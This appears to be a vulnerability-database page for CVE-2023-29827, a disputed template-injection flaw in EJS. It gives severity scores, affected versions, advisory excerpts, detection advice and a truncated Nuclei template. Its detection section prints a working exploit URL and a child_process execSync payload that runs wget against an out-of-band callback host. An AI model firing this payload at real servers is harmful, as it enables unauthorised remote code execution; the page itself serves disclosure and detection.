CVE-2023-29827
published 2023-05-04CVE-2023-29827: ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration…
PriorityP263critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
5.55%
91.9th percentile
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-ejs | — | — |
| ejs | ejs | >= 3.1.9 | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//
commandprocess.mainModule.require('child_process').execSync('wget http://{{interactsh-url}}');
- →Detect SSTI exploitation attempts against EJS via the `closeDelimiter` parameter in the `view options` settings object passed through HTTP query parameters. ↗
- →Look for HTTP GET requests containing `settings[view%20options][closeDelimiter]` or `settings[view options][closeDelimiter]` in the query string as a strong indicator of CVE-2023-29827 exploitation.
- →Monitor for out-of-band HTTP interactions (e.g., interactsh/OAST callbacks) triggered from Node.js processes, which may indicate successful RCE via EJS SSTI.
- →Flag any Node.js process invoking `process.mainModule.require('child_process').execSync` originating from a web request handler, as this is the canonical payload pattern for this CVE.
- ·The vulnerability is disputed by the EJS vendor; the render function is explicitly documented as not intended for use with untrusted input. Detection should be tuned to environments where user-controlled input reaches EJS render calls. ↗
- ·The Nuclei template targets a specific response body string to confirm exploitability; detections should also check for this application-specific response to reduce false positives.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv9.8CRITICAL
vendor_debian9.8LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j5pp-6f4w-r5r6: ejs v3
ghsa_unreviewed·2023-05-04
CVE-2023-29827 [CRITICAL] CWE-74 GHSA-j5pp-6f4w-r5r6: ejs v3
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.
OSV
CVE-2023-29827: ejs v3
osv·2023-05-04·CVSS 9.8
CVE-2023-29827 [CRITICAL] CVE-2023-29827: ejs v3
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.
OSV
CVE-2023-29827: ** DISPUTED ** ejs v3
osv·2023-05-04·CVSS 9.8
CVE-2023-29827 [CRITICAL] CVE-2023-29827: ** DISPUTED ** ejs v3
** DISPUTED ** ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.
Debian
CVE-2023-29827: node-ejs - ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is c...
vendor_debian·2023·CVSS 9.8
CVE-2023-29827 [CRITICAL] CVE-2023-29827: node-ejs - ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is c...
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
No detection rules found.
Nuclei
Embedded JavaScript(EJS) 3.1.6 - Template Injection
nuclei·CVSS 9.8
CVE-2023-29827 [CRITICAL] Embedded JavaScript(EJS) 3.1.6 - Template Injection
Embedded JavaScript(EJS) 3.1.6 - Template Injection
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.
Template:
id: CVE-2023-29827
info:
name: Embedded JavaScript(EJS) 3.1.6 - Template Injection
author: ritikchaddha
severity: critical
description: |
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.
impact: |
High impact as it enables remote code execution.
remediation: |
Update EJS to the latest version to mitigate the vulnerability.
reference:
- https://github.com/mde/ejs/issues/720
- https:/
2023-05-04
Published